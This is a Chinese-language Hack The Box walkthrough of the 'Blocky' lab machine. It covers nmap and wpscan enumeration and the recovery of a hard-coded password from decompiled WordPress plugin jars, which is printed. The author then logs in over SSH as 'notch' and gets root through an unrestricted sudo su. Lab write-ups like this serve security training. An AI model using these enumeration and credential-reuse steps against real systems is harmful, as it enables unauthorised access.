HTB 学习笔记
【Hack The Box】linux练习-- Blocky
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
文章目录
- HTB 学习笔记
- 信息收集
- 21
- 80
- wpscan
信息收集
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
21
nmap将其标识为 ProFTPD 1.3.5a。 searchsploit谷歌搜索也没有发现,我可以在没有授权的情况下利用这个版本的任何漏洞。 1.3.5中存在 文件复制漏洞 ,可能适用于此。 如果我有凭据,我会回来
80
是一个wp站
据他所说还有一个核心插件
/phpmyadmin
很普通,弱口令无效
/plugins
都下载下来
jd-gui 打开
找到一个密码
8YsqfCTnvxAUeduzjNSXe22
wpscan
wpscan --url http://10.10.10.37 -e ap,t,tt,u | tee scans/wpscan
发现 notch用户
i] No plugins Found.
目前为止80页面已经基本挖掘完毕了
ssh notch@10.129.17.38
8YsqfCTnvxAUeduzjNSXe22
sudo -l
发现可以直接sudo su
sudo su
然后就没然后了,直接root了
![[Java]枚举类](https://img-blog.csdnimg.cn/ed3a93ffe37b4d6883b21f45431512a6.png)
![[附源码]计算机毕业设计JAVA基于web鲜花销售系统论文2022](https://img-blog.csdnimg.cn/9d91dcb2ba0c4f1599af99ce4a0fa8aa.png)
